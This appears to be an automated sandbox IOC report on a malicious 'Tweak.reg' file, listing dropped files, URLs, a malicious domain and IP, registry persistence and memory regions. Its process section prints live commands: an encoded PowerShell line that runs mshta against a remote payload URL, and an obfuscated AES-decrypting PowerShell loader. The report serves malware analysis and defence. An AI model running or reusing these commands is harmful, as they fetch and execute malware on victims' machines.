IOC Report
Tweak.reg

loading gif

Files

File Path
Type
Category
Malicious
Tweak.reg
data
initial sample
malicious
C:\Users\user\AppData\Roaming\AutoIt3.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xe073f7d0, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\DonaldDuck[1]
PE32 executable (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vvz2bcy.esf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4uxr2oyi.1lu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gthlxnz.qv5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agqxyxas.jlz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crqk20xl.oxo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5zq2dem.nks.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkqy3knp.b2r.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzrc3koz.1av.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqggwtie.xk4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkrywyf5.con.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlrxjdq2.zt2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvo4rur4.22a.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\DesolateOxidant.a3x
data
dropped
C:\Users\user\AppData\Roaming\DesolateOxidant.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1O7BHFDGG86YGP2V2GV8.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4fa325.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VMFMTNSFZOPWJ6SRSJ9A.temp
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 16 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\regedit.exe
"regedit.exe" "C:\Users\user\Desktop\Tweak.reg"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA
malicious
C:\Windows\System32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object byte[] 16;$tcgVjsHd = $WkCTD.CreateDecryptor();$HeZGuqYHp = $tcgVjsHd.TransformFinalBlock($SQYQyiT, 0, $SQYQyiT.Length);$sMCijoeKV = [System.Text.Encoding]::Utf8.GetString($HeZGuqYHp);$tcgVjsHd.Dispose();& $sMCijoeKV.Substring(0,3) $sMCijoeKV.Substring(3)
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA
malicious
C:\Windows\System32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object byte[] 16;$tcgVjsHd = $WkCTD.CreateDecryptor();$HeZGuqYHp = $tcgVjsHd.TransformFinalBlock($SQYQyiT, 0, $SQYQyiT.Length);$sMCijoeKV = [System.Text.Encoding]::Utf8.GetString($HeZGuqYHp);$tcgVjsHd.Dispose();& $sMCijoeKV.Substring(0,3) $sMCijoeKV.Substring(3)
malicious
C:\Users\user\AppData\Roaming\AutoIt3.exe
"C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
malicious
C:\Users\user\AppData\Roaming\AutoIt3.exe
"C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://pwsh2.pajamas-stoic-failing.lol/
unknown
malicious
https://pwsh2.pajamas-stoic-failing.lol
unknown
malicious
https://pwsh2.pa
unknown
malicious
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
188.114.96.3
malicious
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck.IE5
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck&Y
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck~
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckIE5P2
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckSSC:
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckw
unknown
https://contoso.com/License
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#&
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckn
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://aka.ms/pscore6
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckhF
unknown
https://www.autoitscript.com/autoit3/
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckorer
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckh
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckc
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
https://g.live.com/odclientsettings/ProdV2
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DesolateOxidant.zip
188.114.96.3
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckY
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckC:
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckO
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckP
unknown
http://crl.micft.cMicRosof
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck...
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckL
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckF
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckH
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckE
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckRF
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckwF
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#IE5P2
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck2
unknown
http://crl.mic
unknown
https://contoso.com/Icon
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckrei
unknown
https://aka.ms/winsvr-2022-pshelpX
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck...)
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckLMEM
unknown
http://crl.ver)
unknown
http://www.autoitscript.com/autoit3/X
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck)
unknown
https://github.com/Pester/Pester
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck9F
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#
unknown
http://crl.m
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckime
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#S
unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#Z
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#==h
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck$global:?
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckhttps://pwsh2.pajamas-stoic-failing.lol
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckdeflate
unknown
https://aka.ms/pscore68
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DesolateOxidant.zipp
unknown
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck...M/~
unknown
There are 62 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
pwsh2.pajamas-stoic-failing.lol
188.114.96.3
malicious

IPs

IP
Domain
Country
Malicious
188.114.96.3
pwsh2.pajamas-stoic-failing.lol
European Union
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
MegaLIMLauncher
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
20566D31000
trusted library allocation
page read and write
7FFD9B3A0000
trusted library allocation
page read and write
1CAD6490000
heap
page read and write
1A5E4C74000
heap
page read and write
7FFD9B1B0000
trusted library allocation
page execute and read and write
7FFD9B146000
trusted library allocation
page read and write
20566D60000
trusted library allocation
page read and write
1A5E5360000
trusted library allocation
page read and write
7DA8FFF000
stack
page read and write
1887C960000
trusted library allocation
page read and write
1CAD67E9000
heap
page read and write
20567B88000
heap
page read and write
1872620E000
heap
page read and write
187261F9000
heap
page read and write
1FD651F0000
trusted library allocation
page read and write
1CAD8C0A000
trusted library allocation
page read and write
2CA54FE000
unkown
page readonly
2056BC3E000
heap
page read and write
205679C1000
heap
page read and write
1A5EA21C000
trusted library allocation
page read and write
1CAD88F7000
heap
page read and write
187262B8000
heap
page read and write
1760C6CD000
trusted library allocation
page read and write
2056BE16000
trusted library allocation
page read and write
1CAD8E7C000
trusted library allocation
page read and write
14E4E0AF000
heap
page read and write
1FD64F34000
trusted library allocation
page read and write
20567AF6000
heap
page read and write
205679BF000
heap
page read and write
14E33D75000
heap
page read and write
205679BE000
heap
page read and write
156B000
heap
page read and write
2056C060000
trusted library allocation
page read and write
205679C6000
heap
page read and write
289D7E000
stack
page read and write
1CAD8C09000
trusted library allocation
page read and write
1CAD8C1B000
trusted library allocation
page read and write
1CAD8C06000
trusted library allocation
page read and write
1B9A7F1C000
trusted library allocation
page read and write
1760A74A000
heap
page read and write
15CC000
heap
page read and write
39D5000
heap
page read and write
1CAD8C35000
trusted library allocation
page read and write
205679C6000
heap
page read and write
205679C6000
heap
page read and write
1872629C000
heap
page read and write
7FFD9B520000
trusted library allocation
page execute and read and write
1A5E4D13000
heap
page read and write
20567AF4000
heap
page read and write
1CAD89C0000
heap
page read and write
7FFD9B380000
trusted library allocation
page read and write
1CAD6490000
heap
page read and write
205679BF000
heap
page read and write
1CAD8DC0000
trusted library allocation
page read and write
18800006000
trusted library allocation
page read and write
205679BF000
heap
page read and write
18726295000
heap
page read and write
188010AB000
trusted library allocation
page read and write
1A5EA517000
heap
page read and write
1A5E551A000
heap
page read and write
7FFD9B2C0000
trusted library allocation
page read and write
3919000
heap
page read and write
205679F6000
heap
page read and write
1A5EA2F0000
trusted library allocation
page read and write
1A5E551A000
heap
page read and write
14E4DF70000
heap
page read and write
1887E7F0000
heap
page execute and read and write
28AC4E000
stack
page read and write
1CAD8C1E000
trusted library allocation
page read and write
1CAD89C0000
heap
page read and write
3D6B000
heap
page read and write
1B9A7D6F000
heap
page read and write
1484000
heap
page read and write
205679C7000
heap
page read and write
2056BE19000
trusted library allocation
page read and write
1CAD647D000
heap
page read and write
4480000
direct allocation
page read and write
1CAD88EA000
heap
page read and write
7FFD9B3B0000
trusted library allocation
page read and write
3AC0000
heap
page read and write
7FFD9B282000
trusted library allocation
page read and write
205679C1000
heap
page read and write
1554000
heap
page read and write
20567990000
heap
page read and write
1CAD8D20000
trusted library allocation
page read and write
20567AAE000
heap
page read and write
205679C6000
heap
page read and write
1C2D42A4000
heap
page read and write
14E3805E000
trusted library allocation
page read and write
2056BC38000
heap
page read and write
205679C6000
heap
page read and write
14E33EC0000
heap
page read and write
1CAD8CE0000
trusted library allocation
page read and write
7FFD9B400000
trusted library allocation
page read and write
1CAD88ED000
heap
page read and write
7FFD9B290000
trusted library allocation
page read and write
7FFD9B2F0000
trusted library allocation
page read and write
205679BF000
heap
page read and write
7FFD9B330000
trusted library allocation
page read and write
205679C3000
heap
page read and write
205679C6000
heap
page read and write
20567976000
heap
page read and write
1A5E4C90000
heap
page read and write
1CAD6481000
heap
page read and write
1CAD6498000
heap
page read and write
163A000
heap
page read and write
7FFD9B2B0000
trusted library allocation
page read and write
205679AE000
heap
page read and write
14E37E3E000
trusted library allocation
page read and write
7FFD9B330000
trusted library allocation
page read and write
188010BC000
trusted library allocation
page read and write
205679BF000
heap
page read and write
14E360E5000
trusted library allocation
page read and write
1A5EA350000
remote allocation
page read and write
1872621B000
heap
page read and write
7DA8EFE000
stack
page read and write
205679CC000
heap
page read and write
18726281000
heap
page read and write
2899DF000
stack
page read and write
1A5EA1BE000
trusted library allocation
page read and write
7DF4BCED0000
trusted library allocation
page execute and read and write
1CAD6806000
heap
page read and write
2056BC41000
heap
page read and write
1CAD63B5000
heap
page read and write
18726288000
heap
page read and write
165C000
heap
page read and write
1B9A76D0000
heap
page execute and read and write
15C2000
heap
page read and write
1CAD6800000
heap
page read and write
1B9B7EF3000
trusted library allocation
page read and write
1CAD89C3000
heap
page read and write
1CAD63BE000
heap
page read and write
BD9000
stack
page read and write
205679BF000
heap
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
2CA537E000
stack
page read and write
20567B3D000
heap
page read and write
1CAD6810000
heap
page read and write
1CAD8C01000
trusted library allocation
page read and write
205679C6000
heap
page read and write
14E33CC2000
heap
page read and write
1B9B7E81000
trusted library allocation
page read and write
1CAD8E70000
trusted library allocation
page read and write
17624AD0000
heap
page read and write
205679C6000
heap
page read and write
205679C1000
heap
page read and write
1CAD8A51000
heap
page read and write
1760C6BA000
trusted library allocation
page read and write
205679A5000
heap
page read and write
7FFD9B241000
trusted library allocation
page read and write
205679C6000
heap
page read and write
163A000
heap
page read and write
15C9000
heap
page read and write
1720BCE000
stack
page read and write
1CAD8E68000
trusted library allocation
page read and write
1CAD6490000
heap
page read and write
7FFD9BC30000
trusted library allocation
page read and write
1CAD8A33000
heap
page read and write
1887C770000
heap
page read and write
1A5EA42D000
heap
page read and write
1CAD67CE000
heap
page read and write
15F7000
heap
page read and write
7FFD9B166000
trusted library allocation
page execute and read and write
205679C6000
heap
page read and write
1CAD6833000
heap
page read and write
20567B77000
heap
page read and write
1CAD6487000
heap
page read and write
157B000
heap
page read and write
3A88000
direct allocation
page read and write
1C2D4287000
heap
page read and write
14E37E98000
trusted library allocation
page read and write
1CAD8A35000
heap
page read and write
1A5E5CE0000
trusted library allocation
page read and write
1761C680000
trusted library allocation
page read and write
7FFD9B136000
trusted library allocation
page read and write
7FFD9B2A0000
trusted library allocation
page read and write
1760A77B000
heap
page read and write
1887E839000
heap
page read and write
18800226000
trusted library allocation
page read and write
15AD000
heap
page read and write
7FFD9B340000
trusted library allocation
page read and write
1CAD8C09000
trusted library allocation
page read and write
1887E800000
heap
page read and write
7FFD9B0B0000
trusted library allocation
page read and write
1CAD8C15000
trusted library allocation
page read and write
188012F6000
trusted library allocation
page read and write
205679C6000
heap
page read and write
2056C220000
trusted library allocation
page read and write
3F04000
direct allocation
page read and write
1CAD89FA000
heap
page read and write
2056C208000
trusted library allocation
page read and write
1CAD8E7F000
trusted library allocation
page read and write
20D000
unkown
page readonly
14E4E042000
heap
page read and write
205679BA000
heap
page read and write
1CAD8A33000
heap
page read and write
170000
unkown
page readonly
1CAD89D3000
heap
page read and write
157B000
heap
page execute and read and write
231000
unkown
page readonly
2056BBF7000
heap
page read and write
246437B000
stack
page read and write
188010C4000
trusted library allocation
page read and write
2056C0C0000
trusted library allocation
page read and write
1CAD8C35000
trusted library allocation
page read and write
3D7F000
heap
page read and write
18726235000
heap
page read and write
246453E000
stack
page read and write
7FFD9B460000
trusted library allocation
page read and write
1A5E5BB0000
trusted library section
page readonly
205679BF000
heap
page read and write
1C2D43E0000
heap
page read and write
7FFD9B280000
trusted library allocation
page read and write
1CAD8E6A000
trusted library allocation
page read and write
2056BE19000
trusted library allocation
page read and write
20567AF3000
heap
page read and write
1872629B000
heap
page read and write
205679C1000
heap
page read and write
1CAD8E68000
trusted library allocation
page read and write
1887C75A000
heap
page read and write
20567B76000
heap
page read and write
1A5EA400000
heap
page read and write
15F1000
heap
page read and write
1887C781000
heap
page read and write
1887C980000
trusted library allocation
page read and write
7FFD9B0AB000
trusted library allocation
page execute and read and write
1CAD67F7000
heap
page read and write
17220CC000
stack
page read and write
2CA411B000
stack
page read and write
1CAD649E000
heap
page read and write
1A5E4CAF000
heap
page read and write
11DD000
stack
page read and write
1CAD8C09000
trusted library allocation
page read and write
1760C1D0000
heap
page read and write
1CAD8C0E000
trusted library allocation
page read and write
7FFD9B490000
trusted library allocation
page read and write
1760C7CC000
trusted library allocation
page read and write
1FD64FF6000
heap
page read and write
